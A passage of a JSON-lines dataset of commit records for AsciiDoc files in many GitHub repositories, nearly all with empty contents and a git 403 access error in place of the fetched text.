2015-09-29-One-click-to-run-Apiman-on-Fabric8.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-09-29-One-click-to-run-Apiman-on-Fabric8.adoc","new_file":"_posts\/2015-09-29-One-click-to-run-Apiman-on-Fabric8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4797aafd557236308a3b1c5106a2df5f5c567737","subject":"Update 2017-03-30-Connecting-Satellite-6-and-Ansible-Tower.adoc","message":"Update 2017-03-30-Connecting-Satellite-6-and-Ansible-Tower.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-30-Connecting-Satellite-6-and-Ansible-Tower.adoc","new_file":"_posts\/2017-03-30-Connecting-Satellite-6-and-Ansible-Tower.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7af463bd5b3d2e5fa1173e0285f592ad6430c809","subject":"Update 2016-01-05-One-of-these-is-not-like-the-other.adoc","message":"Update 2016-01-05-One-of-these-is-not-like-the-other.adoc","repos":"duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse","old_file":"_posts\/2016-01-05-One-of-these-is-not-like-the-other.adoc","new_file":"_posts\/2016-01-05-One-of-these-is-not-like-the-other.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duggiemitchell\/JavascriptMuse.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ef4d6968a7ee9bcf24010cfe4898555de638c26","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 
2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7755e48eadd7fef0c880497ac581fcb0c279885e","subject":"Add docker.adoc","message":"Add docker.adoc\n","repos":"google\/grr-doc","old_file":"docker.adoc","new_file":"docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/google\/grr-doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ccd9f3bc842e004f898a76e651dea5880d26fac3","subject":"Update 2015-07-23-Music-visualization-for-Hidden-in-Darkness-using-P5js.adoc","message":"Update 2015-07-23-Music-visualization-for-Hidden-in-Darkness-using-P5js.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-23-Music-visualization-for-Hidden-in-Darkness-using-P5js.adoc","new_file":"_posts\/2015-07-23-Music-visualization-for-Hidden-in-Darkness-using-P5js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff26496c9de21e97b70e12537c09c1c848170696","subject":"Update 2015-07-11-eXtended-IO-for-the-BeBoPr-the-XIO.adoc","message":"Update 2015-07-11-eXtended-IO-for-the-BeBoPr-the-XIO.adoc","repos":"modmaker\/modmaker.github.io,modmaker\/modmaker.github.io,modmaker\/modmaker.github.io","old_file":"_posts\/2015-07-11-eXtended-IO-for-the-BeBoPr-the-XIO.adoc","new_file":"_posts\/2015-07-11-eXtended-IO-for-the-BeBoPr-the-XIO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/modmaker\/modmaker.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d6f2d0751b45885302b3aa299ec517b1103afc7","subject":"Update 2015-09-20-Python-naming-conventions-for-underscores.adoc","message":"Update 2015-09-20-Python-naming-conventions-for-underscores.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-naming-conventions-for-underscores.adoc","new_file":"_posts\/2015-09-20-Python-naming-conventions-for-underscores.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3864352c09f66aceb784ec04db1962fbb188b8d","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 
2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dad417808195def401018444bae38eefd3a9703b","subject":"Changes to work around broken manual placed TOC rendering.","message":"Changes to work around broken manual placed TOC rendering.\n","repos":"pidydx\/artifacts,sebastianwelsh\/artifacts,pidydx\/artifacts,destijl\/artifacts,destijl\/artifacts,sebastianwelsh\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cda36155ea370d75f2d0837d71a95de098c46139","subject":"Update 2017-06-21-Signalr-Client-on-Azure-Web-Job-calling-SignalR-hub-which-is-using-the-Service-Bus-Backplane.adoc","message":"Update 2017-06-21-Signalr-Client-on-Azure-Web-Job-calling-SignalR-hub-which-is-using-the-Service-Bus-Backplane.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-06-21-Signalr-Client-on-Azure-Web-Job-calling-SignalR-hub-which-is-using-the-Service-Bus-Backplane.adoc","new_file":"_posts\/2017-06-21-Signalr-Client-on-Azure-Web-Job-calling-SignalR-hub-which-is-using-the-Service-Bus-Backplane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49a98527a4f83948178ef233efc08cf85dd0763a","subject":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5477b98fa39e072484ca2777cd14dab7aa0a3f19","subject":"explain caching terms at a central place?","message":"explain caching terms at a central place?\n","repos":"cache2k\/cache2k,cache2k\/cache2k,cache2k\/cache2k","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_terms.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_terms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cache2k\/cache2k.git\/': The 
requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81276a8e113ef342c73870a1f4e1350a6fe42f61","subject":"updating hawkular metrics docs","message":"updating hawkular metrics docs\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7627908d2c336fea9133ae600b954fb81b428543","subject":"initial for eclipsecon 2014","message":"initial for eclipsecon 2014\n","repos":"rotty3000\/papersntalks,rotty3000\/papersntalks,rotty3000\/papersntalks","old_file":"2014\/eclipsecon\/semver.adoc","new_file":"2014\/eclipsecon\/semver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rotty3000\/papersntalks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e641a7ac9b8725fd7dcbcf6b35f8cf9b96634e4","subject":"Update 2015-12-20-T143744000-Z-Google-Material-Design.adoc","message":"Update 2015-12-20-T143744000-Z-Google-Material-Design.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2015-12-20-T143744000-Z-Google-Material-Design.adoc","new_file":"_posts\/2015-12-20-T143744000-Z-Google-Material-Design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37db4aa053e6ba6aa1ff8d457c26d8510a86cb6b","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee752f434fe59f892961892a6784e112abbeb6e7","subject":"y2b create post Unboxing Jack's New Laptop...","message":"y2b create post Unboxing Jack's New Laptop...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-04-Unboxing%20Jack's%20New%20Laptop....adoc","new_file":"_posts\/2018-02-04-Unboxing%20Jack's%20New%20Laptop....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6653b4f2e4c76aa24a1c9c00498606a1fd00fde5","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 
2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"193c96c87bee13b3afe3924050968b38249eb61c","subject":"y2b create post This Speaker Has A Special Trick...","message":"y2b create post This Speaker Has A Special Trick...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-12-This-Speaker-Has-A-Special-Trick.adoc","new_file":"_posts\/2016-09-12-This-Speaker-Has-A-Special-Trick.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f18559b1d0f5d036cb1328b486ccfacded8fbcd","subject":"Duplicate entry","message":"Duplicate entry\n","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60e1bddd80afe83ad172b17efb58d572d8a96ff2","subject":"Update 2016-04-16-google-analytics-with-google-apps-script2.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffff20b284b14234636d0fd9a56ea99ac29b82e2","subject":"y2b create post The Mind Blowing 33 Million Pixel Display...","message":"y2b create post The Mind Blowing 33 Million Pixel Display...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-26-The-Mind-Blowing-33-Million-Pixel-Display.adoc","new_file":"_posts\/2018-01-26-The-Mind-Blowing-33-Million-Pixel-Display.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c079d942e38e984397f3f797e2343c9a27ed692b","subject":"y2b create post GTA V Gameplay: First 10 Minutes!","message":"y2b create post GTA V Gameplay: First 10 
Minutes!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-17-GTA-V-Gameplay-First-10-Minutes.adoc","new_file":"_posts\/2013-09-17-GTA-V-Gameplay-First-10-Minutes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52f7a2fde228af4471f734189a1ee3275474847e","subject":"Renamed '_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc' to '_posts\/2017-09-22-adding-about-page-to-hupbressio.adoc'","message":"Renamed '_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc' to '_posts\/2017-09-22-adding-about-page-to-hupbressio.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-22-adding-about-page-to-hupbressio.adoc","new_file":"_posts\/2017-09-22-adding-about-page-to-hupbressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97fe71a113310607c0ca52ccf61551b0cc753f46","subject":"Write the Maven configuration","message":"Write the Maven configuration\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/maven-config.adoc","new_file":"docs\/src\/main\/asciidoc\/maven-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6442fde588c6c872b2d33e98527cb92e11fc43f","subject":"Changes to developer manual","message":"Changes to developer manual\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b65d8ae23880a16a0bf6625b3616c3a8d1416d7","subject":"Update 2015-07-27-How-Git-saved-our-project-or-nearly.adoc","message":"Update 2015-07-27-How-Git-saved-our-project-or-nearly.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-07-27-How-Git-saved-our-project-or-nearly.adoc","new_file":"_posts\/2015-07-27-How-Git-saved-our-project-or-nearly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"755afd108abdfb03f5c324dfd16148df8da6075c","subject":"the folder for NukeSped IoCs added (for the VB2018 paper)","message":"the folder for NukeSped IoCs added (for the VB2018 paper)\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"nukesped_lazarus\/README.adoc","new_file":"nukesped_lazarus\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL 
returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"51f53a2c9f0ba37ee0cab63d7d3683e4861dd0f8","subject":"Update 2015-06-06-Test.adoc","message":"Update 2015-06-06-Test.adoc","repos":"OlgaMaciaszek\/olgamaciaszek.github.io,OlgaMaciaszek\/olgamaciaszek.github.io,OlgaMaciaszek\/olgamaciaszek.github.io","old_file":"_posts\/2015-06-06-Test.adoc","new_file":"_posts\/2015-06-06-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OlgaMaciaszek\/olgamaciaszek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"824f6a1fe2c1739516c423465bdd9db0e91c326a","subject":"Update 2017-03-02-test.adoc","message":"Update 2017-03-02-test.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-03-02-test.adoc","new_file":"_posts\/2017-03-02-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9905ea190ad07eb2a0279cac31ebd0f2f0ba6f1c","subject":"Update 2019-05-09-Summer-19-Release-Developers-Perspective.adoc","message":"Update 2019-05-09-Summer-19-Release-Developers-Perspective.adoc","repos":"arshakian\/arshakian.github.io,arshakian\/arshakian.github.io,arshakian\/arshakian.github.io","old_file":"_posts\/2019-05-09-Summer-19-Release-Developers-Perspective.adoc","new_file":"_posts\/2019-05-09-Summer-19-Release-Developers-Perspective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arshakian\/arshakian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2747afc461c251b84c44bcd371e4bfb8f4308d37","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"gastaldi\/demo-ang2,gastaldi\/demo-ang2,gastaldi\/demo-ang2,gastaldi\/demo-ang2,gastaldi\/demo-ang2","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gastaldi\/demo-ang2.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"fb9d9b3d9c7434b153ef812ac59c27c383b4da8f","subject":"Revert \"Try deleting README.asciidoc to force GitHub to re-generate the initial page\"","message":"Revert \"Try deleting README.asciidoc to force GitHub to re-generate the initial page\"\n\nThis reverts commit 
a2d40593436bf093e3cb2afe4a5b4143905d99d1.\n","repos":"thisco-de\/nanomsg,smithed\/nanomsg,kaostao\/nanomsg,JackDunaway\/featherweight-nanomsg,wfxiang08\/nanomsg,pakozm\/nanomsg,pakozm\/nanomsg,ttyangf\/nanomsg,krafczyk\/nanomsg,krafczyk\/nanomsg,potatogim\/nanomsg,nirs\/nanomsg,smithed\/nanomsg,simplestbest\/nanomsg,thisco-de\/nanomsg,kaostao\/nanomsg,JackDunaway\/featherweight-nanomsg,ttyangf\/nanomsg,yan97ao\/nanomsg,smithed\/nanomsg,modulexcite\/nanomsg,wfxiang08\/nanomsg,wirebirdlabs\/featherweight-nanomsg,cosin2008\/nanomsg.NET,zerotacg\/nanomsg,TTimo\/nanomsg,modulexcite\/nanomsg,cosin2008\/nanomsg.NET,reqshark\/nanomsg,snikulov\/nanomsg,linearregression\/nanomsg,ttyangf\/nanomsg,modulexcite\/nanomsg,featherweight\/ftw-kernel-nanomsg,gdamore\/mamomsg,reqshark\/nanomsg,wirebirdlabs\/featherweight-nanomsg,imp\/nanomsg,linearregression\/nanomsg,zerotacg\/nanomsg,kaostao\/nanomsg,tempbottle\/nanomsg,kaostao\/nanomsg,gdamore\/mamomsg,JackDunaway\/featherweight-nanomsg,zerotacg\/nanomsg,imp\/nanomsg,pch957\/nanomsg,simplestbest\/nanomsg,pch957\/nanomsg,tempbottle\/nanomsg,TTimo\/nanomsg,simplestbest\/nanomsg,hyperfact\/nanomsg,wfxiang08\/nanomsg,hyperfact\/nanomsg,wirebirdlabs\/featherweight-nanomsg,featherweight\/ftw-kernel-nanomsg,TTimo\/nanomsg,nirs\/nanomsg,pakozm\/nanomsg,ttyangf\/nanomsg,cosin2008\/nanomsg.NET,TTimo\/nanomsg,snikulov\/nanomsg,gdamore\/mamomsg,potatogim\/nanomsg,linearregression\/nanomsg,tempbottle\/nanomsg,pch957\/nanomsg,hyperfact\/nanomsg,yan97ao\/nanomsg,smithed\/nanomsg,reqshark\/nanomsg,krafczyk\/nanomsg,yan97ao\/nanomsg,nirs\/nanomsg,imp\/nanomsg,potatogim\/nanomsg","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/featherweight\/ftw-kernel-nanomsg.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c684ff27b42fce1660f57735a1bba4387b956d71","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbf8eed1cf5c4e023e7fef1b864cdc9a29b3177c","subject":"y2b create post iPhone 7 - Sneak Peek","message":"y2b create post iPhone 7 - Sneak Peek","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-24-iPhone-7--Sneak-Peek.adoc","new_file":"_posts\/2016-07-24-iPhone-7--Sneak-Peek.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1fc2a6e33c5361960588799c592de179554e424","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 
2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09584b6a09b45d1af7012e841cde942aaf011f77","subject":"Update 2015-12-29-Starting-the-personal-blog-using-hubpress.adoc","message":"Update 2015-12-29-Starting-the-personal-blog-using-hubpress.adoc","repos":"alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io","old_file":"_posts\/2015-12-29-Starting-the-personal-blog-using-hubpress.adoc","new_file":"_posts\/2015-12-29-Starting-the-personal-blog-using-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexandrev\/alexandrev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65e827da828ed0b96c4cd2382797307a96244c2e","subject":"Add manpage","message":"Add manpage\n","repos":"vasi\/pixz,cicku\/pixz,wookietreiber\/pixz,cicku\/pixz,vasi\/pixz,wookietreiber\/pixz","old_file":"pixz.1.asciidoc","new_file":"pixz.1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vasi\/pixz.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d299592c9de85cb530ac55e6962eef01252c1d11","subject":"Docs: clean up incorrect path in certgen output in the SSL docs","message":"Docs: clean up incorrect path in certgen output in the SSL docs\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@0d2102094cf297b5e740b4495084878b6654bd36\n","repos":"nknize\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,uschindler\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/en\/security\/securing-communications\/setting-up-ssl.asciidoc","new_file":"docs\/en\/security\/securing-communications\/setting-up-ssl.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3135206bbc99a6ab98bb206fe8ddc5f243d0b11d","subject":"Publish 1993-11-17.adoc","message":"Publish 